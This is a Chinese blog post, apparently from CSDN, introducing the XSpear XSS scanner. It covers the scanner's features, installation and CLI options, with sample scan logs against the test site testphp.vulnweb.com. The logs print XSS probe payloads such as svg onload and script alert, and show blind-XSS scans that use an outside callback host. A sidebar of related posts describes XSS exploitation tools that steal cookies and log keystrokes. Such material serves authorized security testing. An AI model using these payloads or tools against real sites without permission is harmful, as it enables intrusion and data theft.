强大的XSS扫描工具:XSpear

最新推荐文章于 2024-03-19 09:54:29 发布
最新推荐文章于 2024-03-19 09:54:29 发布
阅读量583 收藏 6
点赞数 1
分类专栏: web 文章标签: web安全 安全 网络安全 测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79205724/article/details/132623799
版权

还在往各种输入框里提交 <script>alert(/xss/)</script> ?

有这功夫不如喝喝茶、划划水?

试试这款“X矛”吧,绝对会给你带来意想不到的收获。

XSpear

一个针对 XSS 的扫描器。

项目地址:https://github.com/hahwul/XSpear

顾名思义,一款基于 RubyGems 的 XSS 漏洞扫描器。能够进行常见的 XSS 扫描测试以及参数分析。

功能

  • 基于模式匹配的XSS扫描
  • alert confirm prompt 在无痕浏览器上检测事件(使用 Selenium)
  • XSS保护绕过和反射参数的测试请求/响应
    • 反射参数
    • 所有参数(适用于 XSS 和 Anytings)
    • 过滤测试 event handler HTML tag Special Char Useful code
  • 测试 Blind XSS(使用 XSS Hunter,ezXSS,HBXSS,Etc 所有 url base 盲测...)
  • 动态/静态分析
    • 查找 SQL 错误模式
    • 分析 Security 头(CSP HSTS X-frame-options,XSS-protection 等...)
    • 分析其他头文件(服务器版本,内容类型等)
    • XSS 测试到 URL 路径
  • 从原始文件扫描(Burp 套件,ZAP 请求)
  • XSpear 在 Ruby 代码上运行(带有 Gem 库)
  • 显示 table base cli-report 和 filtered rule,testing raw query(url)
  • 在所选参数上进行测试
  • 支持输出格式 cli json
    • cli:摘要,过滤规则(参数),原始查询
  • 支持详细级别(0〜3)
    • 0:相当模式(仅结果)
    • 1:显示扫描状态(默认)
    • 2:显示扫描日志
    • 3:显示详细记录
  • 支持自定义回调代码以测试各种攻击媒介
  • 支持配置文件

安装(Linux下)

Gem 是一个管理 Ruby 库和程序的标准包,它通过 Ruby Gem 源来查找、安装、升级和卸载软件包,非常的便捷。

先安装依赖

$ gem install colorize
$ gem install selenium-webdriver
$ gem install terminal-table
$ gem install progress_bar

再进行安装

$ gem install XSpear

或者本地安装特定版本

下载地址:https://github.com/hahwul/XSpear/releases

再进行安装

$ gem install XSpear-1.3.1.gem

将此行添加到应用程序的Gemfile:

gem 'XSpear'

然后执行

$ bundle

CLI的用法

Usage: xspear -u [target] -[options] [value]
[ e.g ]
$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a 
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2

[ Options ]
    -u, --url=target_URL             [required] Target Url
    -d, --data=POST Body             [optional] POST Method Body data
    -a, --test-all-params            [optional] test to all params(include not reflected)
        --headers=HEADERS            [optional] Add HTTP Headers
        --cookie=COOKIE              [optional] Add Cookie
        --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
    -p, --param=PARAM                [optional] Test paramters
    -b, --BLIND=URL                  [optional] Add vector of Blind XSS
                                      + with XSS Hunter, ezXSS, HBXSS, etc...
                                      + e.g : -b https://hahwul.xss.ht
    -t, --threads=NUMBER             [optional] thread , default: 10
    -o, --output=FORMAT              [optional] Output format (cli , json)
    -c, --config=FILENAME            [optional] Using config.json
    -v, --verbose=0~3                [optional] Show log depth
                                      + v=0 : quite mode(only result)
                                      + v=1 : show scanning status(default)
                                      + v=2 : show scanning logs
                                      + v=3 : show detail log(req/res)
    -h, --help                       Prints this help
        --version                    Show XSpear version
        --update                     Show how to update

输出的结果类型

  • (I)NFO:获取信息(例如sql错误,过滤规则,反映的参数等。)
  • (V)UNL:易受攻击的XSS,已通过Selenium检查/警告/提示/确认
  • (L)OW:低级别问题
  • (M)EDIUM:中级问题
  • (H)IGH:高级别问题

测试

[0]完全模式(仅显示结果)

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 0

[1]显示进度条(默认)

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 1
[*] analysis request..
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]

[#######################################] [249/249] [100.00%] [01:05] [00:00] [  3.83/s]
...

[2]显示扫描日志

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
[*] analysis request..
[I] [22:42:41] [200/OK] [param: cat][Found SQL Error Pattern]
[-] [22:42:41] [200/OK] 'STATIC' not reflected
[-] [22:42:41] [200/OK] 'cat' not reflected <script>alert(45)</script>
[I] [22:42:41] [200/OK] reflected rEfe6[param: cat][reflected parameter]
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
[I] [22:42:43] [200/OK] reflected onhwul=64[param: cat][reflected EHon{any} pattern]
[-] [22:42:54] [200/OK] 'cat' not reflected <img/src onerror=alert(45)>
[-] [22:42:54] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
[H] [22:42:54] [200/OK] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
[V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
...

[3]显示扫描详细日志

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 3
[*] analysis request..
[-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url
[ Request ]
{"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
[ Response ]
{"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:53:23 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
[-] [22:56:21] [200/OK] 'STATIC' not reflected
[-] [22:56:21] [200/OK] cat=123rEfe6 in url
...
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
...
[ Request ]
{"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
[ Response ]
{"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:54:36 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
[H] [22:57:33] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
...

案例测试

扫描XSS

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"

输出 JSON

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0

设定线程数

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30

在所选参数下进行测试

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test

在所有参数下测试

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a

盲测 xss(所有参数)

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht" -a

# Set your blind xss host. <-b options>

在 Burpsuite 上安装

请参考:

https://github.com/hahwul/XSpear/tree/master/forBurp

https://www.hahwul.com/2019/12/run-other-application-on-burp-suiteburp.html

使用

chosennnny
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
XSS-Scanner:基于 Selenium Web Driver 的强大 XSS 扫描器-开源
06-27
您确定您的应用程序是安全的吗? 跨站脚本 (XSS) 是最普遍的 Web 应用程序安全漏洞。 XSS 扫描器会遍历您网站的所有可访问页面,并检查所有可能存在漏洞的表单。 XSS-Scanner 是一个多线程应用程序,可在多个浏览器窗口中并行工作,以节省时间并提高效率。 工作后,它会创建一个带有测试结果报告的漂亮网页。 这个应用程序是完全免费的 XSS 扫描器,基于 Selenium Web 驱动程序。 它直接在您的浏览器中进行扫描。 您所需要的只是带有 FireFoxDriver 的 FireFox(通常它是内置的)。 在这里你可以找到一个自给自足的源代码,如果需要可以随意使用和扩展它:https://github.com/pashna/XSS-scanner 为了检查漏洞,XSS-scanner 使用了一个已知的 XSS-injection 列表owasp:https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 让我们测试并确保安全!
深入解析XXS攻击
jakelihua
01-06 1269
XXS攻击是一种注入恶意脚本代码到网页中的攻击手段。攻击者通过在Web应用中注入JavaScript或其他恶意脚本,使得用户在访问受影响页面时,这些脚本被执行。这可能导致用户数据被窃取、会话劫持,以及其他安全漏洞的利用。
安全测试之xss漏洞的检测与防御
HSS919的博客
03-13 4476
手工检测重点要考虑数据输入的地方,且需要清楚输入的数据输出到什么地方。在检测的开始,可以输入一些敏感字符,比如“、()”等,提交后查看网页源代码的变化以发现输入被输出到什么地方,且可以发现相关敏感字符是否被过滤。手工检测结果相对准确,但效率较低。
XSStrike:智能XSS漏洞检测利器
gitblog_00033的博客
03-19 403
XSStrike:智能XSS漏洞检测利器 项目地址:https://gitcode.com/s0md3v/XSStrike 在网络安全领域,跨站脚本(Cross Site Scripting, XSS)攻击是常见的威胁之一。为了帮助开发者和安全研究人员更有效地检测这类漏洞,我们向您推荐一个强大的自动化工具——XSStrike。 项目简介 XSStrike 是一个先进的渗透测试工具,专为发现Web...
burpsuite插件xssValidator的安装及使用(XSS自动扫描工具
qq_50854662的博客
06-08 2175
在burpsuit的Extender模板下,找到BApp Store,搜索XSS Validator,进行安装即可。xss.js是phantomJS检测xss漏洞的具体实现。下载完成后,将xss.js放在phantomjs同一个文件夹下。下载后配置环境变量,把bin目录下的这个exe加入环境变量。利用phantomjs运行xss.js。就可以看到XSS了!
xss检测工具XSStrike
wutiangui的博客
07-13 1964
通过解析HTML和暴力破解来查找隐藏的参数python3 xsstrike.py -u “http://example.com/page.php” --params。-f, --file //加载自定义paload字典。-t, --encode //定义payload编码方式。-u, --url //指定目标URL。–skip-dom //跳过DOM扫描。-t, --threads //定义线程数。
这个工具可以帮你自动化XSS漏洞的发现和利用:XSS-Exploitation-Tool:一个强大XSS漏洞扫描与利用工具
jklbnm12的博客
07-22 2335
功能说明获取关于目标浏览器的技术数据可以获取目标浏览器的类型、版本、操作系统、语言等信息获取目标用户的地理坐标位置可以获取目标用户的经纬度、国家、城市等信息获取已挂起/已访问的网页快照可以获取目标用户访问过或者正在访问的网页的截图获取已挂起/已访问的网页源代码可以获取目标用户访问过或者正在访问的网页的源代码提取表单输入字段数据可以获取目标用户在表单中输入过或者正在输入的数据获取Cookie数据可以获取目标用户在浏览器中存储的Cookie数据键盘记录功能。
推荐好用的XSS漏洞扫描利用工具
喜欢Python编程的程序员柚柚呀
12-19 1491
toxssin 是一种开源渗透测试工具,可自动执行跨站脚本 (XSS) 漏洞利用过程。它由一个 https 服务器组成,它充当为该工具 (toxin.js) 提供动力的恶意 JavaScript 有效负载生成的流量的解释器。
XSpear:功能强大XSS扫描和参数分析工具&gem
02-02
X矛XSpear是针对Ruby宝石的XSS扫描仪目录主要特点基于模式匹配的XSS扫描在无头浏览器(使用Selenium)上检测alert confirm prompt事件XSS保护绕过和反射(或所有)参数的测试请求/响应反射参数所有参数(适用于XSS和...
内网扫描工具:fscan
03-17
主要语言:Go ...推荐理由:一款内网综合扫描工具,可实现一键自动化、全方位漏扫扫描。该工具提供了丰富的功能,包括端口扫描、服务识别、漏洞检测等,方便安全人员对内网进行全面的安全评估和漏洞扫描
IP扫描工具:Advanced IP Scanner
05-18
Advanced IP Scanner属于IP扫描工具,用于扫描多网段在线以及有记录的IP地址信息,获取同网段在线的IP地址以及同网段设备的MAC地址等等信息,可以远程关机等操作。扫描工具可利用到物联网应用比赛,属于同款软件。...
xsshunter_client:用于XSS Hunter的相关注入代理工具
05-17
XSS Hunter客户端 这个工具是做什么用的? 该工具可用于生成相关的XSS有效负载,这些有效负载用唯一的ID标记,该ID可用于跟踪哪个HTTP请求导致触发了哪个XSS有效负载。 使用此工具,将跟踪您的所有注入尝试,并且您生成的报告将在最终输出中包含负责任的注入尝试。 这很有用,因为XSS有效负载通常可以在触发之前遍历多个服务(甚至是协议),因此并不总是清楚是什么注入导致了某个XSS有效负载触发。 设置 在创建一个XSS Hunter帐户 通过运行virtualenv env创建新的虚拟环境 通过运行source env/bin/activate获取新创建的环境 通过运行pip install -r requirements.txt安装所需的库 运行配置生成工具./generate_config.py并按照提到的步骤进行操作。 现在,使用此客户端作为内联脚本运行mitmproxy:
内网扫描工具:一款内网综合扫描工具,可实现一键自动化、全方位漏扫扫描
最新发布
04-24
一款内网综合扫描工具,可实现一键自动化、全方位漏扫扫描。该工具提供了丰富的功能,包括端口扫描、服务识别、漏洞检测等,方便安全人员对内网进行全面的安全评估和漏洞扫描
xss测试工具xsstrike(基于python3)
weixin_50464560的博客
09-19 7006
xsstrike很强 项目地址: https://github.com/s0md3v/XSStrike 1 安装: git clone https://github.com/s0md3v/XSStrike.git 1 使用文档: https://github.com/s0md3v/XSStrike/wiki/Usage usage: xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [-
【2024版】最新推荐好用的XSS漏洞扫描利用工具
Libra1313的博客
01-25 1433
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
XSS漏洞总结 附带burp xss检测插件使用
weixin_52206305的博客
03-11 1044
注意:JavaScript加载外部的代码文件可以是任意扩展名(无扩展名也可以),如:
【BurpSuite工具系】使用BurpSuite一次完整的测试XSS漏洞
run_boy_2022的博客
07-21 1568
xss.js是phantomJS检测xss漏洞的具体实现,进入phantomjs-2.1.1-windows\bin目录打开cmd,执行 phantomjs.exe xss.js 命令设置监听。在Intruder的执行界面上,我们可以通过xss_result来查看payload的检测情况,那些响应报文中存在漏洞标志的均被打√显示出来。开始后,可以看下我们之前phantomjs.exe xss.js 这个命令控制台是否有日志输出。便于我们从控制台观察结果。结果发现系统还是ok的,xss_bug列没有√。
XSSFORK:新一代XSS自动扫描测试工具(精)
墨痕诉清风的博客
12-26 7230
xssfork是一款新一代xss漏洞探测工具,其开发的目的是帮助安全从业者高效率的检测xss安全漏洞。与传统检测工具相比xssfork使用的是 webkit内核的浏览器phantomjs,其可以很好的模拟浏览器。工具分为两个部分,xssfork和xssforkapi,其中xssfork在对网站fuzz xss的时候会调用比较多的payload。话不多说,一起来研究下这款工具吧?
XSStrike工具的安装及使用(包括实战应用)
逍遥小哥的博客
05-29 4740
除此之外,XSStrike还具有爬行,模糊测试,参数发现,WAF检测功能。FCKeditor 2.6.7 及之前版本的 editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php 的 print_textinputs_var 函数中存在跨站脚本 (XSS) 漏洞,远程攻击者可利用该漏洞通过 textinputs 数组参数注入任意 Web 脚本或 HTML。(我的是在kali是跑的,直接下载脚本使用就行)
redis命令scan扫描 test:bb:*
06-13
您好,使用 Redis 命令 scan 可以扫描指定模式下的所有键,语法如下: ``` SCAN cursor [MATCH pattern] [COUNT count] ``` 其中,`cursor` 表示游标,初始值为 0;`MATCH pattern` 表示键的模式;`COUNT count` 表示每次扫描的键的数量,建议不要太大,一般为 10 或 100。 如果您要扫描 test:bb:* 模式下的所有键,可以使用下面的命令: ``` SCAN 0 MATCH test:bb:* COUNT 100 ``` 这个命令会从游标 0 开始扫描 test:bb:* 模式下的键,每次扫描 100 个键,直到扫描完所有键为止。注意,这个命令可能会比较慢,因为 Redis 是单线程的,需要遍历所有键才能返回结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

chosennnny

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值